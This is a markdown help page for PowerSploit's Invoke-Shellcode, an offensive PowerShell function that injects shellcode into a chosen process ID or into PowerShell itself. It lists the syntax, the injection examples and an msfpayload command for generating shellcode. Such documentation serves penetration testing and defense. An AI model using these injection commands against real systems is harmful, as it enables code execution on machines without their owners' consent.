docs/CodeExecution/Invoke-Shellcode.md


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116

# Invoke-Shellcode

## SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.

PowerSploit Function: Invoke-Shellcode  
Author: Matthew Graeber (@mattifestation)  
License: BSD 3-Clause  
Required Dependencies: None  
Optional Dependencies: None

## SYNTAX

```
Invoke-Shellcode [-ProcessID <UInt16>] [-Shellcode <Byte[]>] [-Force]
```

## DESCRIPTION
Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre

PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX.
To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):

msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/\[";\]//g;s/\\\\/,0/g' | tr -d '\n' | cut -c2-

Make sure to specify 'thread' for your exit process.
Also, don't bother encoding your shellcode.
It's entirely unnecessary.

## EXAMPLES

### -------------------------- EXAMPLE 1 --------------------------
```
Invoke-Shellcode -ProcessId 4274
```

Description
-----------
Inject shellcode into process ID 4274.

### -------------------------- EXAMPLE 2 --------------------------
```
Invoke-Shellcode
```

Description
-----------
Inject shellcode into the running instance of PowerShell.

### -------------------------- EXAMPLE 3 --------------------------
```
Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)
```

Description
-----------
Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)
Warning: This script has no way to validate that your shellcode is 32 vs.
64-bit!

## PARAMETERS

### -ProcessID
Process ID of the process you want to inject shellcode into.

```yaml
Type: UInt16
Parameter Sets: (All)
Aliases: 

Required: False
Position: Named
Default value: 0
Accept pipeline input: False
Accept wildcard characters: False
```

### -Shellcode
Specifies an optional shellcode passed in as a byte array

```yaml
Type: Byte[]
Parameter Sets: (All)
Aliases: 

Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```

### -Force
Injects shellcode without prompting for confirmation.
By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.

```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: 

Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```

## INPUTS

## OUTPUTS

## NOTES

## RELATED LINKS